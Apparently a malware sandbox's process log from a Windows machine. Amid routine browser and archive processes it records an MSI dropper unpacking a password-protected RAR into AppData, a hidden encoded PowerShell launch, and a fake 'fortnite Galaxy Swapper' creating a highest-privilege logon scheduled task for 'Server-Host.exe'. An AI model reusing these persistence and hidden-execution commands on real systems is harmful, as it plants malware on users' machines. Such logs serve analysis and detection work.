"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2276,15611654232394026286,10125993392299444423,131072 --lang=es --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=37 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4040 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2276,15611654232394026286,10125993392299444423,131072 --lang=es --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=38 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6948 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2276,15611654232394026286,10125993392299444423,131072 --lang=es --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=39 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5324 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2276,15611654232394026286,10125993392299444423,131072 --lang=es --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=40 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4576 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2276,15611654232394026286,10125993392299444423,131072 --lang=es --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=41 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7060 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2276,15611654232394026286,10125993392299444423,131072 --lang=es --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=42 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6652 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=2276,15611654232394026286,10125993392299444423,131072 --lang=es --service-sandbox-type=none --mojo-platform-channel-handle=5512 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2276,15611654232394026286,10125993392299444423,131072 --lang=es --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=45 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6820 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=2276,15611654232394026286,10125993392299444423,131072 --lang=es --service-sandbox-type=none --mojo-platform-channel-handle=7744 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2276,15611654232394026286,10125993392299444423,131072 --lang=es --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=48 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2424 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2276,15611654232394026286,10125993392299444423,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --gpu-preferences=UAAAAAAAAADoAAAQAAAAAAAAAAAAAAAAAABgAAAEAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=7504 /prefetch:2
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2276,15611654232394026286,10125993392299444423,131072 --lang=es --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=51 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6744 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=2276,15611654232394026286,10125993392299444423,131072 --lang=es --service-sandbox-type=none --mojo-platform-channel-handle=1992 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2276,15611654232394026286,10125993392299444423,131072 --lang=es --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=54 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6896 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=2276,15611654232394026286,10125993392299444423,131072 --lang=es --service-sandbox-type=none --mojo-platform-channel-handle=6856 /prefetch:8
C:\Windows\system32\mspaint.exe
"C:\Windows\system32\mspaint.exe" "C:\Users\Admin\Downloads\desktop-1920x1080.jpg" /ForceBootstrapPaint3D
C:\Windows\system32\mspaint.exe
"C:\Windows\system32\mspaint.exe" "C:\Users\Admin\Downloads\desktop-1920x1080.jpg" /ForceBootstrapPaint3D
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s DsSvc
C:\Windows\system32\OpenWith.exe
C:\Windows\system32\OpenWith.exe -Embedding
C:\Windows\system32\OpenWith.exe
C:\Windows\system32\OpenWith.exe -Embedding
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2276,15611654232394026286,10125993392299444423,131072 --lang=es --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=57 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=1748 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2276,15611654232394026286,10125993392299444423,131072 --lang=es --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=59 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6088 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=2276,15611654232394026286,10125993392299444423,131072 --lang=es --service-sandbox-type=none --mojo-platform-channel-handle=5892 /prefetch:8
C:\Program Files\7-Zip\7zFM.exe
"C:\Program Files\7-Zip\7zFM.exe"
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2276,15611654232394026286,10125993392299444423,131072 --lang=es --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=61 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6224 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2276,15611654232394026286,10125993392299444423,131072 --lang=es --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=62 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=1316 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2276,15611654232394026286,10125993392299444423,131072 --lang=es --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=63 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3060 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2276,15611654232394026286,10125993392299444423,131072 --lang=es --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=64 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6568 /prefetch:1
C:\Program Files\7-Zip\7zFM.exe
"C:\Program Files\7-Zip\7zFM.exe" "C:\Users\Admin\Downloads\_x64__x32__installer__.zip"
C:\Windows\System32\msiexec.exe
"C:\Windows\System32\msiexec.exe" /i "C:\Users\Admin\Downloads\x64__installer__v2.0.5.msi"
C:\Windows\system32\msiexec.exe
C:\Windows\system32\msiexec.exe /V
C:\Windows\syswow64\MsiExec.exe
C:\Windows\syswow64\MsiExec.exe -Embedding A4E1F0BDBC29017E2BAFA3A41C9F21D9
C:\Users\Admin\AppData\Roaming\Bivaji Coms\BivaApp\UnRAR.exe
"C:\Users\Admin\AppData\Roaming\Bivaji Coms\BivaApp\UnRAR.exe" x -p2161183588a "C:\Users\Admin\AppData\Roaming\Bivaji Coms\BivaApp\nijboq.rar" "C:\Users\Admin\AppData\Roaming\Bivaji Coms\BivaApp\"
C:\Users\Admin\AppData\Roaming\Bivaji Coms\BivaApp\rnpkeys.exe
"C:\Users\Admin\AppData\Roaming\Bivaji Coms\BivaApp\rnpkeys.exe"
C:\Windows\SysWOW64\explorer.exe
C:\Windows\SysWOW64\explorer.exe explorer.exe
C:\Windows\System32\msiexec.exe
"C:\Windows\System32\msiexec.exe" /i "C:\Users\Admin\Downloads\x64__installer__v2.0.5.msi"
C:\Windows\syswow64\MsiExec.exe
C:\Windows\syswow64\MsiExec.exe -Embedding 28D303C2E11E68AD8D1F8225C1D3F397
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -windowstyle hidden -e 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
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2276,15611654232394026286,10125993392299444423,131072 --lang=es --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=65 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3064 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffb3f8746f8,0x7ffb3f874708,0x7ffb3f874718
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2096,14640812946059064137,2922419122950102448,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2140 /prefetch:2
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2096,14640812946059064137,2922419122950102448,131072 --lang=es --service-sandbox-type=none --mojo-platform-channel-handle=2196 /prefetch:3
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2096,14640812946059064137,2922419122950102448,131072 --lang=es --service-sandbox-type=utility --mojo-platform-channel-handle=2680 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2096,14640812946059064137,2922419122950102448,131072 --lang=es --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3384 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2096,14640812946059064137,2922419122950102448,131072 --lang=es --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3396 /prefetch:1
C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2096,14640812946059064137,2922419122950102448,131072 --lang=es --extension-process --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3992 /prefetch:1
C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2096,14640812946059064137,2922419122950102448,131072 --lang=es --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4084 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2096,14640812946059064137,2922419122950102448,131072 --lang=es --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4100 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2096,14640812946059064137,2922419122950102448,131072 --lang=es --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3496 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --field-trial-handle=2096,14640812946059064137,2922419122950102448,131072 --lang=es --service-sandbox-type=audio --mojo-platform-channel-handle=5644 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=video_capture.mojom.VideoCaptureService --field-trial-handle=2096,14640812946059064137,2922419122950102448,131072 --lang=es --service-sandbox-type=video_capture --mojo-platform-channel-handle=4052 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2096,14640812946059064137,2922419122950102448,131072 --lang=es --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4424 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2096,14640812946059064137,2922419122950102448,131072 --lang=es --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4036 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2096,14640812946059064137,2922419122950102448,131072 --lang=es --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=15 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6084 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2096,14640812946059064137,2922419122950102448,131072 --lang=es --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=16 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3488 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2096,14640812946059064137,2922419122950102448,131072 --lang=es --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=17 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3100 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2096,14640812946059064137,2922419122950102448,131072 --lang=es --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=18 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5820 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2096,14640812946059064137,2922419122950102448,131072 --lang=es --service-sandbox-type=none --mojo-platform-channel-handle=6296 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2096,14640812946059064137,2922419122950102448,131072 --lang=es --service-sandbox-type=none --mojo-platform-channel-handle=6296 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2096,14640812946059064137,2922419122950102448,131072 --lang=es --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=20 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=1808 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2096,14640812946059064137,2922419122950102448,131072 --lang=es --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=21 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5560 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2096,14640812946059064137,2922419122950102448,131072 --lang=es --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=22 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6380 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2096,14640812946059064137,2922419122950102448,131072 --lang=es --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=23 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6152 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_collections.mojom.CollectionsDataManager --field-trial-handle=2096,14640812946059064137,2922419122950102448,131072 --lang=es --service-sandbox-type=collections --mojo-platform-channel-handle=3592 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2096,14640812946059064137,2922419122950102448,131072 --lang=es --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=26 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4636 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=2096,14640812946059064137,2922419122950102448,131072 --lang=es --service-sandbox-type=none --mojo-platform-channel-handle=4012 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2096,14640812946059064137,2922419122950102448,131072 --lang=es --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=29 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6088 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=2096,14640812946059064137,2922419122950102448,131072 --lang=es --service-sandbox-type=none --mojo-platform-channel-handle=6076 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2096,14640812946059064137,2922419122950102448,131072 --lang=es --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=31 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5212 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2096,14640812946059064137,2922419122950102448,131072 --lang=es --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=32 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4252 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2096,14640812946059064137,2922419122950102448,131072 --lang=es --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=33 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4636 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2096,14640812946059064137,2922419122950102448,131072 --lang=es --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=34 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2052 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2096,14640812946059064137,2922419122950102448,131072 --lang=es --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=36 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3424 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2096,14640812946059064137,2922419122950102448,131072 --lang=es --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=38 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5916 /prefetch:1
C:\Program Files\7-Zip\7zFM.exe
"C:\Program Files\7-Zip\7zFM.exe" "C:\Users\Admin\Downloads\0680d99cd3e9932de4429d04bbbf6032e8b670700d70d758d9377e899552fc9a.zip"
C:\Program Files\7-Zip\7zFM.exe
"C:\Program Files\7-Zip\7zFM.exe" "C:\Users\Admin\Downloads\dd7893c7eed9662f479225efff35609cf555c810c5cb0b1e316af2b2e88131ac.zip"
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2096,14640812946059064137,2922419122950102448,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --gpu-preferences=UAAAAAAAAADoAAAQAAAAAAAAAAAAAAAAAABgAAAEAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=6700 /prefetch:2
C:\Program Files\7-Zip\7zFM.exe
"C:\Program Files\7-Zip\7zFM.exe" "C:\Users\Admin\Downloads\dd7893c7eed9662f479225efff35609cf555c810c5cb0b1e316af2b2e88131ac.zip"
C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE
"C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Admin\Downloads\document.rtf" /o ""
C:\Users\Admin\Downloads\fortnite Galaxy Swapper.exe
"C:\Users\Admin\Downloads\fortnite Galaxy Swapper.exe"
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "Server-Host" /tr '"C:\Users\Admin\AppData\Roaming\Server-Host.exe"' & exit
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tmpEDDD.tmp.bat""
C:\Windows\SysWOW64\schtasks.exe
schtasks /create /f /sc onlogon /rl highest /tn "Server-Host" /tr '"C:\Users\Admin\AppData\Roaming\Server-Host.exe"'
C:\Windows\SysWOW64\timeout.exe
timeout 3
C:\Users\Admin\AppData\Roaming\Server-Host.exe
"C:\Users\Admin\AppData\Roaming\Server-Host.exe"
C:\Users\Admin\Downloads\fortnite Galaxy Swapper.exe
"C:\Users\Admin\Downloads\fortnite Galaxy Swapper.exe"
C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE
